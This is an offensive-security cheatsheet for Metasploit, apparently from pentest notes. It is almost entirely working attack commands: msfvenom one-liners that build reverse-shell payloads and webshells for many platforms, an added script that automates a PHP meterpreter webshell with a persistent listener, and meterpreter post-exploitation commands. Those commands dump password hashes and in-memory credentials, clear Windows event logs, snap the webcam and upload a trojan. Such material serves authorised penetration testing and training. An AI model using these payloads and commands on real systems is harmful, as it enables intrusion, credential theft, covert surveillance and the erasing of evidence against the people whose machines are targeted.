# Metasploit Cheatsheet

## Resources

{% embed url="https://www.offensive-security.com/metasploit-unleashed/" %}

{% embed url="https://netsec.ws/?p=331" %}

## Searchsploit

```
searchsploit <search> #search the local Exploit-DB copy
searchsploit -x <path/to/exploit> #examine (read) an exploit from the search results
```

## Msfconsole

```
msfconsole -h #usage options
msf > help
msf > <command> -h
msf > help search

connect <ip> <port> #netcat-like client

edit #edit the current module

grep <http> search <oracle> #match output containing the string "http" from a search for modules containing the string "oracle"

info

load <plugin> #load plugin
unload <plugin> #unload plugin

route <add/remove> <subnet> <netmask> <session_id> #allows you to route sockets through a session or ‘comm’, providing basic pivoting capabilities
route flush #remove all routes
route print #show all active routes

search name:mysql
search type:post
search cve:2011 author:jduck platform:linux

background
sessions -l #list sessions
sessions -i 1 #interact with session 1

set <rhost> <ip> #configure options for the current module
unset <rhost> #remove a parameter
unset all # remove all parameters

setg <rhost> <ip> #set global variables
unsetg #unset global variables
save #after setting your different variables, you can run the save command to save your current environment and settings

show <auxiliary/exploits/...>
show options
show advanced #more options
show payloads
show targets
show encoders #useful in exploit development when you aren't quite certain which payload encoding methods will work with a given exploit
show nops #display nop generators
show evasion

use <module/module_id>

back
banner
check #see if the target is vulnerable without exploiting it; not every module implements it
color
exit
irb #drop into a live Ruby interpreter shell
jobs #Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.
kill <0> #kill job 0
loadpath <path> #load a third-party module tree from that path so you can point Metasploit at your own exploits, encoders, payloads, etc.
resource <karma.rc> #runs resource (batch) files that can be loaded through msfconsole.

exploit -j # run in the background
```

## Msfvenom

```
### List payloads ###

msfvenom -l payloads #list payloads; also: encoders, nops, formats, platforms, archs

### Binaries ###

## Linux ##

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

## Windows ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

## Mac ##

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

### Web Payloads ###

## PHP ##
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
#the raw output starts with the tag commented out ('/*<?php /**/'), so prepend '<?php ' or the server serves it as text
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php #macOS clipboard trick
printf '<?php ' | cat - shell.php > shell.tmp && mv shell.tmp shell.php #portable equivalent

## ASP ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

## ASPX ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

## JSP ##

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

## WAR ##

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

### Scripting Payloads ###

## Python ##

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

## Bash ##

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

## Perl ##

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

### Shellcode ###

#For all shellcode see 'msfvenom --list formats' for the valid output formats (c, python, csharp, ...). msfvenom outputs the shellcode as an array literal you can paste into your exploit in that language.
#add -b '\x00' to exclude bad characters (msfvenom then picks an encoder for you) or -e <encoder> -i <iterations> to choose one yourself

## Linux Based Shellcode ##

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

## Windows Based Shellcode ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

## Mac Based Shellcode ##

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
```

## Handler

```
use exploit/multi/handler
set PAYLOAD <payload used with msfvenom> #must match exactly (staged vs stageless)
set LHOST <Your IP Address>
set LPORT <Your Port to Connect On>
exploit -j #run as a background job
```
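The msfvenom PHP tag fix and the handler set-up, tied together as a small POSIX shell script. This is an added example, not code from the cheatsheet or from the Metasploit project: it writes a multi/handler resource file from the same payload, LHOST and LPORT that were passed to msfvenom, so the listener cannot drift from the payload, and it prepends the `<?php ` tag that msfvenom's raw PHP output lacks without relying on macOS pbcopy/pbpaste. The address 10.10.14.5, port 4444 and the file names are assumed values, and the `GEN_PAYLOAD=1` guard is this script's own convention so the text-generating functions can be run on a box without Metasploit.

```shell
#!/bin/sh
# Added example: generate a payload and a matching multi/handler resource file.
# Not part of the cheatsheet; LHOST 10.10.14.5, LPORT 4444 and file names are assumptions.

# handler_rc PAYLOAD LHOST LPORT
# Prints an msfconsole resource script for a persistent, non-interactive listener.
# ExitOnSession=false keeps the handler alive after the first session;
# -j runs it as a job, -z does not drop you into new sessions automatically.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# php_wrap FILE
# msfvenom's raw PHP output starts with the tag commented out ('/*<?php /**/'),
# so a web server would serve it as plain text. Prepend '<?php ' once; a second
# call is a no-op, so the function is safe to re-run on an already wrapped file.
php_wrap() {
    f=$1
    case "$(head -n 1 "$f")" in
        '<?php'*) ;;                                                      # already wrapped
        *) printf '<?php ' | cat - "$f" > "$f.tmp" && mv "$f.tmp" "$f" ;;
    esac
}

# Only call msfvenom/msfconsole when explicitly asked, so the functions above
# can be sourced and exercised on a machine without Metasploit installed.
if [ "${GEN_PAYLOAD:-0}" = 1 ]; then
    payload=php/meterpreter_reverse_tcp
    msfvenom -p "$payload" LHOST=10.10.14.5 LPORT=4444 -f raw > shell.php
    php_wrap shell.php
    handler_rc "$payload" 10.10.14.5 4444 > handler.rc
    msfconsole -q -r handler.rc    # -q: no banner, -r: run the resource file
fi
```

`GEN_PAYLOAD=1 sh payload.sh` runs the full flow and leaves msfconsole listening. Passing the payload string through one variable matters more than it looks: the staged `php/meterpreter/reverse_tcp` and the stageless `php/meterpreter_reverse_tcp` need different handlers, and a listener configured for the wrong one silently drops the connection.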

## Shell to meterpreter

```
use post/multi/manage/shell_to_meterpreter
set SESSION <session_id>
run
sessions -u <session_id> #shortcut for the same upgrade
```

## Meterpreter

```
help
background
clearev #clear the Application, System and Security event logs on a Windows target
download <c:\\boot.ini> #use double-slashes
edit <file.txt> #use vim
execute -f <cmd.exe> -i -H #run a program on the target (-i interact with it, -H hide its window)
getuid #display the user running on the host
hashdump #dump SAM database
idletime #display time that the user at the remote machine has been idle
ipconfig
lpwd / lcd #print/change the working directory on your machine, not on the target
sysinfo
getsystem #try to escalate to SYSTEM (Windows only)
ps
migrate <1832> #move meterpreter into PID 1832, e.g. a more stable or higher-privileged process (post/windows/manage/migrate picks one for you)
resource <resource.txt> #call a file with meterpreter instructions
search -f <autoexec.bat> #locate specific file
search -d <c:\\xampp\\> -f <sea*.bat> #-d restricts the search to a directory
shell #standard shell on the target system
upload <trojan.exe> <c:\\windows\\system32> #use double-slashes
webcam_list
webcam_snap
load <python/kiwi/...> #load an extension, e.g. kiwi (mimikatz)
creds_all #kiwi: dump all credentials from memory
```
